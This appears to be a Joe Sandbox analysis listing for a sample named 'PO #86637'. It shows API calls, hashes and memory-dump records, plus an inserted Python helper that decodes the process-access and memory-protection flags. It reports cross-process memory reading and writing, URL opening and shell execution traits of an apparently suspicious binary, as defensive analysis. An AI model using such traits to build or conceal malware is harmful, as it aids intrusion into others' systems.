                      Similarity
                      • API ID: DeleteDestroyObject$IconMessageSendWindow
                      • String ID:
                      • API String ID: 1489400265-0
                      • Opcode ID: 7dd20da83386a23a1814408c1199d2c33e99a8c26f67204b6fd348d50f61361a
                      • Instruction ID: 3262712e9a8127eed33bb9eb3d9864066e7dde5d47db0d590f2b6463dd6d37f9
                      • Opcode Fuzzy Hash: 7dd20da83386a23a1814408c1199d2c33e99a8c26f67204b6fd348d50f61361a
                      • Instruction Fuzzy Hash: 07017C74300601DBCB10EF25EEC8A2A73A8BF48712F004569FE019B286D778DC49CB68
                      APIs
                        • Part of subcall function 00430003: InvalidateRect.USER32(?,00000000,00000001), ref: 00430091
                      • DestroyWindow.USER32(?), ref: 00455728
                      • DeleteObject.GDI32(?), ref: 00455736
                      • DeleteObject.GDI32(?), ref: 00455744
                      • DestroyIcon.USER32(?), ref: 00455752
                      • DestroyWindow.USER32(?), ref: 00455760
                      Similarity
                      • API ID: Destroy$DeleteObjectWindow$IconInvalidateRect
                      • String ID:
                      • API String ID: 1042038666-0
                      • Opcode ID: 9df849479103f2de49514c9ec76f9cef1897402069f9b01ba3cc14c1fa4130bc
                      • Instruction ID: 2016740d4609c4bbd0e5f1cf6dc7522ca00853e433b5032f7809eda0dc31aff9
                      • Opcode Fuzzy Hash: 9df849479103f2de49514c9ec76f9cef1897402069f9b01ba3cc14c1fa4130bc
                      • Instruction Fuzzy Hash: 3701F670200601DBCB10EF69E9D8A2B37ACAF49762B00466AFD01D7256D769DC498B69
                      APIs
                      Similarity
                      • API ID: Path$ObjectStroke$DeleteFillSelect
                      • String ID:
                      • API String ID: 2625713937-0
                      • Opcode ID: d1b587dd721dc2c7258c81d6469637db7768a45f5ba7f0175e0776e0e6e6c26f
                      • Instruction ID: 382768f54733291aaafbd4c53fc5fd67df7ff3e11fccf1fbf51b229105ba29ed
                      • Opcode Fuzzy Hash: d1b587dd721dc2c7258c81d6469637db7768a45f5ba7f0175e0776e0e6e6c26f
                      • Instruction Fuzzy Hash: B3F036751125109BD3519F28FD4875E3B68E747321F94423AEA15923F0CB785449CB6D
                      APIs
                      • __getptd.LIBCMT ref: 0041780F
                        • Part of subcall function 00417A69: __getptd_noexit.LIBCMT ref: 00417A6C
                        • Part of subcall function 00417A69: __amsg_exit.LIBCMT ref: 00417A79
                      • __getptd.LIBCMT ref: 00417826
                      • __amsg_exit.LIBCMT ref: 00417834
                      • __lock.LIBCMT ref: 00417844
                      • __updatetlocinfoEx_nolock.LIBCMT ref: 00417858
                      Similarity
                      • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                      • String ID:
                      • API String ID: 938513278-0
                      • Opcode ID: 82c9f3bbc84dc287df7640515fd49376d4ae64643407e313ceafc36016311655
                      • Instruction ID: 276dd8d19a6a3be70f37c916a71154ef36d62806621923b96dbf7b6e4fe89171
                      • Opcode Fuzzy Hash: 82c9f3bbc84dc287df7640515fd49376d4ae64643407e313ceafc36016311655
                      • Instruction Fuzzy Hash: 6DF09632A4C7009AD721BBA6940B7DD33B0AF10768F11415FF541572D2CB6C59C1CB9D
                      APIs
                        • Part of subcall function 004118F0: _doexit.LIBCMT ref: 004118FC
                      • ___set_flsgetvalue.LIBCMT ref: 00413D20
                        • Part of subcall function 004178AE: TlsGetValue.KERNEL32(?,00417A07,?,004115F6,?,00401BAC,?,?,?), ref: 004178B7
                        • Part of subcall function 004178AE: TlsSetValue.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 004178D8
                      • ___fls_getvalue@4.LIBCMT ref: 00413D2B
                        • Part of subcall function 0041788E: TlsGetValue.KERNEL32(?,?,00413D30,00000000), ref: 0041789C
                      • ___fls_setvalue@8.LIBCMT ref: 00413D3E
                      • GetLastError.KERNEL32(00000000,?,00000000), ref: 00413D47
                      • ExitThread.KERNEL32 ref: 00413D4E
                      • GetCurrentThreadId.KERNEL32 ref: 00413D54
                      • __freefls@4.LIBCMT ref: 00413D74
                      Similarity
                      • API ID: Value$Thread$CurrentErrorExitLast___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4_doexit
                      • String ID:
                      • API String ID: 2403457894-0
                      • Opcode ID: 20cce849b0c51a5c00e20c35783146c720bf18a6b0a2527f17bda4bbe7e89b53
                      • Instruction ID: 99982f4671f9afe760f134679f3a1374bf557b67af872bc9692f731b59fefeca
                      • Opcode Fuzzy Hash: 20cce849b0c51a5c00e20c35783146c720bf18a6b0a2527f17bda4bbe7e89b53
                      • Instruction Fuzzy Hash: 1AE04F318443056B8F013BB39C1E8CF363C9E0434AB20082ABE1493112DA2C99C1C6BE
                      APIs
                        • Part of subcall function 004118F0: _doexit.LIBCMT ref: 004118FC
                      • ___set_flsgetvalue.LIBCMT ref: 004151C0
                        • Part of subcall function 004178AE: TlsGetValue.KERNEL32(?,00417A07,?,004115F6,?,00401BAC,?,?,?), ref: 004178B7
                        • Part of subcall function 004178AE: TlsSetValue.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 004178D8
                      • ___fls_getvalue@4.LIBCMT ref: 004151CB
                        • Part of subcall function 0041788E: TlsGetValue.KERNEL32(?,?,00413D30,00000000), ref: 0041789C
                      • ___fls_setvalue@8.LIBCMT ref: 004151DD
                      • GetLastError.KERNEL32(00000000,?,00000000), ref: 004151E6
                      • ExitThread.KERNEL32 ref: 004151ED
                      • __freefls@4.LIBCMT ref: 00415209
                      Similarity
                      • API ID: Value$ErrorExitLastThread___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4_doexit
                      • String ID:
                      • API String ID: 4247068974-0
                      • Opcode ID: 3508d61e785490a8cfc18c63a66594c600054726567160c295e9e14b5a274e31
                      • Instruction ID: 3b3fb4cf1982b2ada2e5851f983e2cc6228237abb2dca353483d11accd99f00a
                      • Opcode Fuzzy Hash: 3508d61e785490a8cfc18c63a66594c600054726567160c295e9e14b5a274e31
                      • Instruction Fuzzy Hash: E5E0B631848705AECB013BB29D1E9DF3A799E54749B20082ABE1492122EE6C88D1C669
                      Strings
                      Similarity
                      • API ID:
                      • String ID: 5$8$^
                      • API String ID: 0-3622883839
                      • Opcode ID: 5b0bf54134f80cff9ca6ce4a8dff4b23300e7e002ba4f74be1d0103a91d53083
                      • Instruction ID: 6ee989b57c56cc683e8081b45a60e8d88641feefa2b309a8211b066407c3f2e5
                      • Opcode Fuzzy Hash: 5b0bf54134f80cff9ca6ce4a8dff4b23300e7e002ba4f74be1d0103a91d53083
                      • Instruction Fuzzy Hash: 82F1B4B1D00649AACB24CFA9C940AEEFBF4EF84300F14856FE455E7351E3B89A45CB56
                      Strings
                      Similarity
                      • API ID:
                      • String ID: )$U$\
                      • API String ID: 0-3705770531
                      • Opcode ID: 028001eb2bff774db3903015b7fa80ce6d69291786b8857f67b928b721b55690
                      • Instruction ID: d0f1885598f34d5f764b4f2a5794ec4e3d7857f6dac93f6e146ba8491093b400
                      • Opcode Fuzzy Hash: 028001eb2bff774db3903015b7fa80ce6d69291786b8857f67b928b721b55690
                      • Instruction Fuzzy Hash: 83C1C074A00249CFEB24CF69C5806AEBBF2FF85304F2481ABD8569B351D739994ACF15
                      APIs
                        • Part of subcall function 004426CD: _wcslen.LIBCMT ref: 004426F9
                      • CoInitialize.OLE32(00000000), ref: 0046E505
                      • CoCreateInstance.OLE32(00482A08,00000000,00000001,004828A8,?), ref: 0046E51E
                      • CoUninitialize.OLE32 ref: 0046E53D
                      Strings
                      Similarity
                      • API ID: CreateInitializeInstanceUninitialize_wcslen
                      • String ID: .lnk
                      • API String ID: 886957087-24824748
                      • Opcode ID: 275befd32e5b5cb51e2fc879a9ecc6bbb724afd33f596a1e549e31a6ffdfd8c7
                      • Instruction ID: 2644725dabb75134900838bfbf7f9974cf5b6b8c274c659ea1b0544ab4b4cf98
                      • Opcode Fuzzy Hash: 275befd32e5b5cb51e2fc879a9ecc6bbb724afd33f596a1e549e31a6ffdfd8c7
                      • Instruction Fuzzy Hash: A6A1CB756042019FC700EF65C980E5BB7E9AFC8308F108A5EF9859B392DB35EC45CBA6
                      Strings
                      • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 0046A75B
                      Similarity
                      • API ID: _memmovestd::exception::exception$Exception@8Throw_malloc_wcslen
                      • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                      • API String ID: 708495834-557222456
                      • Opcode ID: 0835c6591df01f69715f5e8aca6b92cd03353c77de4b2b2244ddd74c7a14709d
                      • Instruction ID: 9c514e09f8cb76db8ae150367893d7536957bb5c5403f45e3580b17af89e858a
                      • Opcode Fuzzy Hash: 0835c6591df01f69715f5e8aca6b92cd03353c77de4b2b2244ddd74c7a14709d
                      • Instruction Fuzzy Hash: 7C917F711087009FC310EF65C88186BB7E8AF89314F148D2FF595672A2E778E919CB9B
                      APIs
                        • Part of subcall function 00434319: WriteProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 0043434A
                      • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 004365EF
                        • Part of subcall function 004342DD: ReadProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 0043430E
                        • Part of subcall function 004343AD: GetWindowThreadProcessId.USER32(?,?), ref: 004343E0
                        • Part of subcall function 004343AD: OpenProcess.KERNEL32(00000438,00000000,?), ref: 004343F1
                        • Part of subcall function 004343AD: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004), ref: 00434408
                      • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0043665F
                      • SendMessageW.USER32(00000000,00001111,00000000,00000000), ref: 004366DF
                      Strings
                      Similarity
                      • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                      • String ID: @
                      • API String ID: 4150878124-2766056989
                      • Opcode ID: 6104cbe5d4ae3c4c99a3306f76968d572a7f9f5d55716afa725ed0ba86ca2a2d
                      • Instruction ID: 60a9f40d71a87185ad744a771aacdfc79ad0a16393efc777ae91d2f205fac39b
                      • Opcode Fuzzy Hash: 6104cbe5d4ae3c4c99a3306f76968d572a7f9f5d55716afa725ed0ba86ca2a2d
                      • Instruction Fuzzy Hash: 0D51B972A00218ABCB10DFA5DD42FDEB778EFC9304F00459AFA05EB180D6B4BA45CB65
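Added analyst helper, not part of the Joe Sandbox report: the record above lists OpenProcess with access mask 00000438, VirtualAllocEx with type 00001000 and protection 00000004, and WriteProcessMemory plus ReadProcessMemory in the same function. The report prints the raw hex only. The Python below parses API reference lines in exactly the format shown above, decodes the numeric arguments against the Windows SDK bit names (winnt.h / memoryapi.h), and reports whether the combination is sufficient for a cross-process memory write. The sample record is copied from the list above; the result keys `cross_process_write` and `executable_remote_memory` are this example's own labels, not report fields.

```python
"""Decode the API reference lines of one Joe Sandbox function record."""
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# Bit names from the Windows SDK headers (winnt.h, memoryapi.h).
PROCESS_ACCESS = {
    0x0001: "PROCESS_TERMINATE",
    0x0002: "PROCESS_CREATE_THREAD",
    0x0008: "PROCESS_VM_OPERATION",
    0x0010: "PROCESS_VM_READ",
    0x0020: "PROCESS_VM_WRITE",
    0x0040: "PROCESS_DUP_HANDLE",
    0x0080: "PROCESS_CREATE_PROCESS",
    0x0100: "PROCESS_SET_QUOTA",
    0x0200: "PROCESS_SET_INFORMATION",
    0x0400: "PROCESS_QUERY_INFORMATION",
    0x0800: "PROCESS_SUSPEND_RESUME",
    0x1000: "PROCESS_QUERY_LIMITED_INFORMATION",
}
ALLOC_TYPE = {0x1000: "MEM_COMMIT", 0x2000: "MEM_RESERVE"}
PAGE_PROTECT = {
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
}

# One reference line as the report prints it, e.g.
#   "Part of subcall function 004343AD: OpenProcess.KERNEL32(00000438,00000000,?), ref: 004343F1"
#   "_wcslen.LIBCMT ref: 00410162"          (CRT calls carry no argument list)
LINE_RE = re.compile(
    r"(?:Part of subcall function [0-9A-Fa-f]+:\s*)?"
    r"(?P<name>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)"
)


@dataclass
class ApiCall:
    name: str
    module: str
    args: List[Optional[int]]  # None where the report printed "?"
    ref: int                   # address of the call site


def parse_api_line(line: str) -> Optional[ApiCall]:
    """Return the call described by one bullet line, or None for headings."""
    text = line.strip().lstrip("•").strip()
    m = LINE_RE.search(text)
    if not m:
        return None
    raw = m.group("args")
    args = [] if not raw else [None if a == "?" else int(a, 16) for a in raw.split(",")]
    return ApiCall(m.group("name"), m.group("module"), args, int(m.group("ref"), 16))


def decode_flags(value: int, table: Dict[int, str]) -> List[str]:
    """Name every known bit in value; any unknown remainder is kept as hex."""
    names = [name for bit, name in sorted(table.items()) if value & bit]
    known = sum(bit for bit in table if value & bit)
    leftover = value & ~known
    if leftover:
        names.append(f"0x{leftover:X}")
    return names


def assess(record_lines: List[str]) -> dict:
    """Decode the process-access and allocation arguments of one record."""
    calls = [c for c in (parse_api_line(l) for l in record_lines) if c is not None]
    names = {c.name for c in calls}

    def first(name: str) -> Optional[ApiCall]:
        return next((c for c in calls if c.name == name), None)

    out: dict = {"apis": sorted(names)}
    op = first("OpenProcess")
    if op and op.args and op.args[0] is not None:
        out["access"] = decode_flags(op.args[0], PROCESS_ACCESS)
    va = first("VirtualAllocEx")
    if va and len(va.args) == 5:  # hProcess, lpAddress, dwSize, flAllocationType, flProtect
        out["alloc_type"] = decode_flags(va.args[3], ALLOC_TYPE) if va.args[3] is not None else ["?"]
        out["protect"] = decode_flags(va.args[4], PAGE_PROTECT) if va.args[4] is not None else ["?"]
    access = set(out.get("access", []))
    # WriteProcessMemory needs VM_OPERATION | VM_WRITE on the target handle.
    out["cross_process_write"] = (
        "WriteProcessMemory" in names and {"PROCESS_VM_OPERATION", "PROCESS_VM_WRITE"} <= access
    )
    out["executable_remote_memory"] = any(p.startswith("PAGE_EXECUTE") for p in out.get("protect", []))
    return out


# Copied from the record above (constructed input for this example).
SAMPLE_RECORD = [
    "• Part of subcall function 00434319: WriteProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 0043434A",
    "• SendMessageW.USER32(?,00001104,00000000,00000000), ref: 004365EF",
    "• Part of subcall function 004342DD: ReadProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 0043430E",
    "• Part of subcall function 004343AD: GetWindowThreadProcessId.USER32(?,?), ref: 004343E0",
    "• Part of subcall function 004343AD: OpenProcess.KERNEL32(00000438,00000000,?), ref: 004343F1",
    "• Part of subcall function 004343AD: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004), ref: 00434408",
    "• SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0043665F",
    "• SendMessageW.USER32(00000000,00001111,00000000,00000000), ref: 004366DF",
]

if __name__ == "__main__":
    for key, value in assess(SAMPLE_RECORD).items():
        print(f"{key}: {value}")
```

For this record the mask decodes to PROCESS_VM_OPERATION | PROCESS_VM_READ | PROCESS_VM_WRITE | PROCESS_QUERY_INFORMATION and the remote allocation is MEM_COMMIT with PAGE_READWRITE. That is the minimum needed for the WriteProcessMemory and ReadProcessMemory calls in the same function, but the page is not executable, so this record on its own shows a cross-process data read/write (the shape of a helper that reads a control's item data out of another process) rather than code execution; functions that map or execute remote memory have to be checked separately.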
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: _memmove
                      • String ID: \$]$h
                      • API String ID: 4104443479-3262404753
                      • Opcode ID: 176a597a96dcd2a70b70cc410daef71b144e937b03d0c11d284d361abdce2453
                      • Instruction ID: f8aecd1968ad4f88b1990a67d2c0a139cd5c037738d7fdf96801fcbc28408ccb
                      • Opcode Fuzzy Hash: 176a597a96dcd2a70b70cc410daef71b144e937b03d0c11d284d361abdce2453
                      • Instruction Fuzzy Hash: 97518470E00209DFDF18CFA5C980AAEB7F2BF85304F29826AD405AB355D7385D45CB55
                      APIs
                      • ShellExecuteExW.SHELL32(0000003C), ref: 00457D67
                        • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                        • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                      • CloseHandle.KERNEL32(?), ref: 00457E09
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: CloseExecuteHandleShell_wcscpy_wcslen
                      • String ID: <$@
                      • API String ID: 2417854910-1426351568
                      • Opcode ID: 456975d6943100b9bccf6a944bdff1bb50055e47ea808eda8884d41227499f4e
                      • Instruction ID: b88a15a70aa0ad5f6f29005b2a8070d35214d1ef645994392ec84fe4d9ca6df0
                      • Opcode Fuzzy Hash: 456975d6943100b9bccf6a944bdff1bb50055e47ea808eda8884d41227499f4e
                      • Instruction Fuzzy Hash: C751D3719002089BDB10EFA1D985AAFB7B4EF44309F10446EED05AB352DB79ED49CB94
                      APIs
                      • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0044A87A
                      • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0044A8C9
                      • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 0044A901
                        • Part of subcall function 004422CB: GetLastError.KERNEL32 ref: 004422E1
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: Http$ErrorInfoInternetLastOpenQueryRequestSend
                      • String ID:
                      • API String ID: 3705125965-3916222277
                      • Opcode ID: 0ee13e9a60eb6ba6c748d714ed0ce9e8e081c7518857538375ec5b6ad63af0be
                      • Instruction ID: d28fa13b4dde737238ce5dcfaacd3c540a76458eeabd88e5a6b3f8614e5f537b
                      • Opcode Fuzzy Hash: 0ee13e9a60eb6ba6c748d714ed0ce9e8e081c7518857538375ec5b6ad63af0be
                      • Instruction Fuzzy Hash: DB310B76A802047AE720EF56DC42FDFB7A8EBD9710F00851FFA0097281D6B5550987AC
                      APIs
                      • GetMenuItemInfoW.USER32 ref: 0045FAC4
                      • DeleteMenu.USER32(?,?,00000000), ref: 0045FB15
                      • DeleteMenu.USER32(00000000,?,00000000), ref: 0045FB68
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: Menu$Delete$InfoItem
                      • String ID: 0
                      • API String ID: 135850232-4108050209
                      • Opcode ID: 44596b6c283006d3404d95c3e5e16104138b05286e513df4f299336d423ce3c8
                      • Instruction ID: 2caf7e1b7ae413ca61a5456c92b2eab9e90ede26a48057f627e29f4096114103
                      • Opcode Fuzzy Hash: 44596b6c283006d3404d95c3e5e16104138b05286e513df4f299336d423ce3c8
                      • Instruction Fuzzy Hash: CC41D2B1604201ABD710CF25CC45F17B7A9AF84315F148A2EFDA49B2C2D378E849CBA6
                      APIs
                      • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013), ref: 0045085F
                      • GetWindowLongW.USER32(?,000000F0), ref: 0045087D
                      • SetWindowLongW.USER32(?,000000F0,00000000), ref: 0045088E
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: Window$Long
                      • String ID: SysTreeView32
                      • API String ID: 847901565-1698111956
                      • Opcode ID: 6654344cdbbec2ecb5663208c63790126aca218b871aedcbee15bef271784643
                      • Instruction ID: 2f6c96d6d770cdd7f6b01965cae739f5ffbb06f7b8c4bfc7c6bf121f6b9a1f40
                      • Opcode Fuzzy Hash: 6654344cdbbec2ecb5663208c63790126aca218b871aedcbee15bef271784643
                      • Instruction Fuzzy Hash: 34418D75500205ABEB10DF29DC84FEB33A8FB49325F20471AF865972D1D778E895CBA8
                      APIs
                      • LoadLibraryA.KERNEL32(?), ref: 00434B10
                      • GetProcAddress.KERNEL32(?,AU3_GetPluginDetails), ref: 00434B88
                      • FreeLibrary.KERNEL32(?), ref: 00434B9F
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: Library$AddressFreeLoadProc
                      • String ID: AU3_GetPluginDetails
                      • API String ID: 145871493-4132174516
                      • Opcode ID: 525874d34911f66d3e6dd89a42f64d0fb8abb6a055dcd3ee386d4a3c405b38ac
                      • Instruction ID: fc8523f5daf935d660d2a9c884068eb8da3e2fc1adb06f3317e0194b47a185ca
                      • Opcode Fuzzy Hash: 525874d34911f66d3e6dd89a42f64d0fb8abb6a055dcd3ee386d4a3c405b38ac
                      • Instruction Fuzzy Hash: C24107B9600605EFC710DF59D8C0E9AF7A5FF89304B1082AAEA1A8B311D735FD52CB95
                      APIs
                      • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00450DFD
                      • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00450E16
                      • SendMessageW.USER32(?,00001002,00000000,?), ref: 00450E3E
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: MessageSend$Window
                      • String ID: SysMonthCal32
                      • API String ID: 2326795674-1439706946
                      • Opcode ID: aa3fdffd2c37c9d1283d502314bb1f920e47acbbfa02c8d10baeab348a12d0cc
                      • Instruction ID: 97bf4b40409f6c90460d1384a7672ac630dd7a2161d32aee0dcf483843136ede
                      • Opcode Fuzzy Hash: aa3fdffd2c37c9d1283d502314bb1f920e47acbbfa02c8d10baeab348a12d0cc
                      • Instruction Fuzzy Hash: A93195752002046BDB10DEA9DC85FEB73BDEB9C724F104619FA24A72C1D6B4FC558B64
                      APIs
                      • DestroyWindow.USER32(00000000), ref: 00450A2F
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: DestroyWindow
                      • String ID: msctls_updown32
                      • API String ID: 3375834691-2298589950
                      • Opcode ID: ede3ba3c4388c74c76a3cd747824982d62f6d25d37162a4df1ebcaa7ffb6df4e
                      • Instruction ID: fccd3fcc05e4e2aaf5990a1cc96ccc3c6d01ef6560d5fec67e6c7c3c5f699695
                      • Opcode Fuzzy Hash: ede3ba3c4388c74c76a3cd747824982d62f6d25d37162a4df1ebcaa7ffb6df4e
                      • Instruction Fuzzy Hash: 213182767402056FE710DF58EC81FAB3368FF99710F10411AFA009B282C7B5AC96C7A8
                      APIs
                      Strings
                      Memory Dump Source
